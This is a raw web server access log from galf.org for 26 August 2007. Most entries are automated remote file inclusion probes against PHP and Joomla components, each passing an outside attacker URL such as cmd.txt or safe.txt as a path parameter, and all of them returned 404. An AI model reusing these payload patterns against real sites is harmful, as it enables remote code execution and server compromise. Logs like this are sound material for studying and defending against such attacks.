193.254.202.116 - - [26/Aug/2007:12:04:01 -0700] "GET /logs/announcements.php?phpraid_dir=http://dlnks.com/z/z/k.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.254.202.116 - - [26/Aug/2007:12:04:01 -0700] "GET /announcements.php?phpraid_dir=http://dlnks.com/z/z/k.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
201.9.217.224 - - [26/Aug/2007:12:06:37 -0700] "GET / HTTP/1.1" 200 1048 "http://www.google.com.br/search?hl=pt-BR&q=lesbianas&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
201.9.217.224 - - [26/Aug/2007:12:06:54 -0700] "GET /cendoc/ HTTP/1.1" 200 526 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
201.9.217.224 - - [26/Aug/2007:12:06:58 -0700] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/cendoc/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
201.9.217.224 - - [26/Aug/2007:12:07:04 -0700] "GET /labia/ HTTP/1.1" 200 524 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
74.6.28.49 - - [26/Aug/2007:12:09:40 -0700] "GET /?D=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.19.115 - - [26/Aug/2007:12:09:57 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "labia.galf.org"
74.6.27.81 - - [26/Aug/2007:12:09:58 -0700] "GET /actual/ HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "labia.galf.org"
66.135.39.23 - - [26/Aug/2007:12:12:38 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:12:12:38 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:12:12:38 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:12:12:38 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
72.30.61.91 - - [26/Aug/2007:12:13:00 -0700] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
84.19.182.51 - - [26/Aug/2007:12:13:35 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://truck.ucoz.ru/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.19.182.51 - - [26/Aug/2007:12:13:36 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://truck.ucoz.ru/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.147.239.104 - - [26/Aug/2007:12:14:32 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geneseobeadstudio.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.147.239.104 - - [26/Aug/2007:12:14:32 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geneseobeadstudio.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
87.118.104.72 - - [26/Aug/2007:12:17:43 -0700] "GET /logs/access_070716.log//modules/4nalbum/public/displaycategory.php?basepath=http://www.avgwarez.altervista.org/micmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.53.183.132 - - [26/Aug/2007:12:17:52 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://br.geocities.com/prcanteiro/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.183.132 - - [26/Aug/2007:12:17:53 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://br.geocities.com/prcanteiro/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.205.80.53 - - [26/Aug/2007:12:20:59 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.205.80.53 - - [26/Aug/2007:12:21:00 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.64.121.61 - - [26/Aug/2007:12:23:12 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://sikodoq.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.64.121.61 - - [26/Aug/2007:12:23:12 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://sikodoq.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.118.100.9 - - [26/Aug/2007:12:24:01 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.118.100.9 - - [26/Aug/2007:12:24:07 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.133.127 - - [26/Aug/2007:12:25:21 -0700] "GET /logs/access.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://rootssearch.net/bo.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.58.133.127 - - [26/Aug/2007:12:25:22 -0700] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://rootssearch.net/bo.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
195.49.173.97 - - [26/Aug/2007:12:26:12 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
195.49.173.97 - - [26/Aug/2007:12:26:12 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.88.56.82 - - [26/Aug/2007:12:27:04 -0700] "GET /logs/access_070716.log//modules/4nalbum/public/displaycategory.php?basepath=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.26.52.40 - - [26/Aug/2007:12:28:01 -0700] "GET /logs/access_070716.log/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.26.52.40 - - [26/Aug/2007:12:28:01 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.227.63.202 - - [26/Aug/2007:12:28:19 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://truck.ucoz.ru/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.227.63.202 - - [26/Aug/2007:12:28:19 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://truck.ucoz.ru/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.26.52.40 - - [26/Aug/2007:12:29:43 -0700] "GET /logs/access.log/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
87.118.100.9 - - [26/Aug/2007:12:30:21 -0700] "GET /logs/access_070813.log//modules/4nalbum/public/displaycategory.php?basepath=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
87.118.100.9 - - [26/Aug/2007:12:30:25 -0700] "GET //modules/4nalbum/public/displaycategory.php?basepath=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.118.100.9 - - [26/Aug/2007:12:30:29 -0700] "GET /logs//modules/4nalbum/public/displaycategory.php?basepath=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.207.108.27 - - [26/Aug/2007:12:32:11 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.radioroedovre.dk//oneadmin/_files/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.207.108.27 - - [26/Aug/2007:12:32:12 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.radioroedovre.dk//oneadmin/_files/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.150.70.2 - - [26/Aug/2007:12:32:26 -0700] "GET /logs/!scanhttp://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.150.70.2 - - [26/Aug/2007:12:32:27 -0700] "GET /!scanhttp://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.27.60.48 - - [26/Aug/2007:12:34:24 -0700] "GET /logs/ HTTP/1.0" 200 4926 "http://www.google.com/search?q=intitle:%22index.of%22+logs&hl=en&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.galf.org"
212.27.60.48 - - [26/Aug/2007:12:34:25 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
72.249.16.72 - - [26/Aug/2007:12:36:50 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/liviupustiu/u.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.198.89.228 - - [26/Aug/2007:12:36:51 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://breakthru.us/images/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.198.89.228 - - [26/Aug/2007:12:36:51 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://breakthru.us/images/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.64.121.61 - - [26/Aug/2007:12:36:59 -0700] "GET /logs/access_070618.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://sikodoq.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.18.159.125 - - [26/Aug/2007:12:37:14 -0700] "GET /index2.php?url_page=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.18.159.125 - - [26/Aug/2007:12:37:23 -0700] "GET /index2.php?url_page=http://abc.someshit.ru//base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.18.159.125 - - [26/Aug/2007:12:37:27 -0700] "GET /index2.php?url_page=http://abc.someshit.ru//base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.18.159.125 - - [26/Aug/2007:12:37:29 -0700] "GET /logs/index2.php?url_page=http://abc.someshit.ru//base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.18.159.125 - - [26/Aug/2007:12:37:32 -0700] "GET /logs/index2.php?url_page=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.18.159.125 - - [26/Aug/2007:12:37:32 -0700] "GET /logs/index2.php?url_page=http://abc.someshit.ru//base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.64.121.61 - - [26/Aug/2007:12:37:40 -0700] "GET /logs/access_070611.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://sikodoq.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.18.159.125 - - [26/Aug/2007:12:38:07 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
83.18.159.125 - - [26/Aug/2007:12:38:08 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.19.182.51 - - [26/Aug/2007:12:39:26 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://truck.ucoz.ru/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.19.182.51 - - [26/Aug/2007:12:39:27 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://truck.ucoz.ru/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [26/Aug/2007:12:39:57 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
212.227.63.202 - - [26/Aug/2007:12:40:43 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://truck.ucoz.ru/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.227.63.202 - - [26/Aug/2007:12:40:44 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://truck.ucoz.ru/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:12:42:03 -0700] "GET /logs/access_070723.log/index.php2?p=http://71.102.93.10/WTS/bin/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:12:42:03 -0700] "GET /logs/access_070723.log/index.php2?p=http://www.garrettloftusauctioneers.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:12:42:03 -0700] "GET /index.php2?p=http://71.102.93.10/WTS/bin/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:12:42:03 -0700] "GET /index.php2?p=http://www.garrettloftusauctioneers.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:12:42:03 -0700] "GET /logs/index.php2?p=http://71.102.93.10/WTS/bin/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:12:42:03 -0700] "GET /logs/index.php2?p=http://www.garrettloftusauctioneers.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.75.204.106 - - [26/Aug/2007:12:42:55 -0700] "GET /logs/access_070723.log/index.php2?p=http://www.fredericlucalandi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.75.204.106 - - [26/Aug/2007:12:42:55 -0700] "GET /index.php2?p=http://www.fredericlucalandi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.75.204.106 - - [26/Aug/2007:12:42:55 -0700] "GET /logs/access_070723.log/index.php2?p=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.75.204.106 - - [26/Aug/2007:12:42:56 -0700] "GET /logs/index.php2?p=http://www.fredericlucalandi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.75.204.106 - - [26/Aug/2007:12:42:56 -0700] "GET /index.php2?p=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.75.204.106 - - [26/Aug/2007:12:42:56 -0700] "GET /logs/index.php2?p=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
219.239.89.26 - - [26/Aug/2007:12:44:37 -0700] "GET /logs/index2.php?x=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.239.89.26 - - [26/Aug/2007:12:44:37 -0700] "GET /index2.php?x=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.205.80.53 - - [26/Aug/2007:12:46:27 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
75.68.57.116 - - [26/Aug/2007:12:47:02 -0700] "GET /labia/ HTTP/1.1" 200 524 "http://www.google.com/search?hl=en&q=%22index+of%27%22+labia" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "galf.org"
75.68.57.116 - - [26/Aug/2007:12:47:03 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "galf.org"
75.68.57.116 - - [26/Aug/2007:12:47:04 -0700] "GET / HTTP/1.1" 200 1048 "http://galf.org/labia/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "galf.org"
75.68.57.116 - - [26/Aug/2007:12:47:07 -0700] "GET /logs/ HTTP/1.1" 200 4942 "http://galf.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "galf.org"
75.68.57.116 - - [26/Aug/2007:12:47:10 -0700] "GET /cendoc/ HTTP/1.1" 200 526 "http://galf.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "galf.org"
75.68.57.116 - - [26/Aug/2007:12:47:14 -0700] "GET /tmp/ HTTP/1.1" 200 520 "http://galf.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "galf.org"
84.19.182.51 - - [26/Aug/2007:12:48:31 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://truck.ucoz.ru/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
84.19.182.51 - - [26/Aug/2007:12:48:32 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://truck.ucoz.ru/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
70.86.234.242 - - [26/Aug/2007:12:48:50 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://topnlpsites.com/images/gif/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.249.16.72 - - [26/Aug/2007:12:49:23 -0700] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/liviupustiu/u.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.249.16.72 - - [26/Aug/2007:12:49:23 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/liviupustiu/u.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.249.16.72 - - [26/Aug/2007:12:50:02 -0700] "GET /logs/access_070618.log//modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/liviupustiu/u.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.133.127 - - [26/Aug/2007:12:54:44 -0700] "GET /logs/access_070813.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://rootssearch.net/bo.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.195.75.7 - - [26/Aug/2007:12:55:00 -0700] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [26/Aug/2007:12:55:01 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.118.100.9 - - [26/Aug/2007:12:57:03 -0700] "GET /logs/access_070723.log//modules/4nalbum/public/displaycategory.php?basepath=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [26/Aug/2007:12:57:48 -0700] "GET /logs/access_070618.log//modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
219.239.89.26 - - [26/Aug/2007:12:58:10 -0700] "GET /logs/index2.php?x=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.239.89.26 - - [26/Aug/2007:12:58:11 -0700] "GET /index2.php?x=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.239.89.26 - - [26/Aug/2007:12:59:41 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.239.89.26 - - [26/Aug/2007:12:59:41 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.239.89.26 - - [26/Aug/2007:12:59:42 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.255.48.112 - - [26/Aug/2007:13:02:21 -0700] "GET /index.php?path=http://www.roughmix.to/ico/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
219.239.89.26 - - [26/Aug/2007:13:03:59 -0700] "GET /logs/access_070730.log/index2.php?x=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.239.89.26 - - [26/Aug/2007:13:03:59 -0700] "GET /logs/access_070813.log/index2.php?x=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.29.90.201 - - [26/Aug/2007:13:03:59 -0700] "GET /index.php?template=http://ziul.net/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.120.129.44 - - [26/Aug/2007:13:05:32 -0700] "GET / HTTP/1.0" 200 1032 "http://www.courbis.fr" "Courbis presente Voyage au centre de la HP28" "www.galf.org"
85.18.118.81 - - [26/Aug/2007:13:06:54 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.18.118.81 - - [26/Aug/2007:13:06:55 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.8.20.194 - - [26/Aug/2007:13:13:58 -0700] "GET /logs/access_070730.log HTTP/1.1" 206 50000 "" "Mozilla/5.0 (Windows; U; Win98; de-DE; rv:0.9.4.1) Gecko/20020508 Netscape6/6.2.3" "www.galf.org"
83.18.159.125 - - [26/Aug/2007:13:15:35 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.18.159.125 - - [26/Aug/2007:13:15:35 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.118.100.9 - - [26/Aug/2007:13:15:56 -0700] "GET /logs/access_070813.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.118.100.9 - - [26/Aug/2007:13:15:57 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.118.100.9 - - [26/Aug/2007:13:16:00 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.118.100.9 - - [26/Aug/2007:13:16:02 -0700] "GET /logs/access_070723.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
122.153.62.163 - - [26/Aug/2007:13:18:06 -0700] "GET //modules/4nalbum/public/displaycategory.php?basepath=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:13:26:38 -0700] "GET /logs/access_070618.log//modules/4nalbum/public/displaycategory.php?basepath=http://www.garrettloftusauctioneers.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:13:26:38 -0700] "GET /logs/access_070618.log//modules/4nalbum/public/displaycategory.php?basepath=http://71.102.93.10/WTS/bin/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:13:26:38 -0700] "GET //modules/4nalbum/public/displaycategory.php?basepath=http://www.garrettloftusauctioneers.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:13:26:39 -0700] "GET //modules/4nalbum/public/displaycategory.php?basepath=http://71.102.93.10/WTS/bin/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:13:26:39 -0700] "GET /logs//modules/4nalbum/public/displaycategory.php?basepath=http://www.garrettloftusauctioneers.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:13:26:39 -0700] "GET /logs//modules/4nalbum/public/displaycategory.php?basepath=http://71.102.93.10/WTS/bin/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.99.239.51 - - [26/Aug/2007:13:26:49 -0700] "GET /logs/access.log/index1.php?pag=http://www.puredynamics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
62.99.239.51 - - [26/Aug/2007:13:26:49 -0700] "GET /index1.php?pag=http://www.puredynamics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
62.99.239.51 - - [26/Aug/2007:13:26:50 -0700] "GET /logs/index1.php?pag=http://www.puredynamics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
212.241.213.186 - - [26/Aug/2007:13:31:17 -0700] "GET /logs/access_070716.log/index.php?pagina=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.186 - - [26/Aug/2007:13:31:18 -0700] "GET /index.php?pagina=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.186 - - [26/Aug/2007:13:31:18 -0700] "GET /logs/index.php?pagina=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
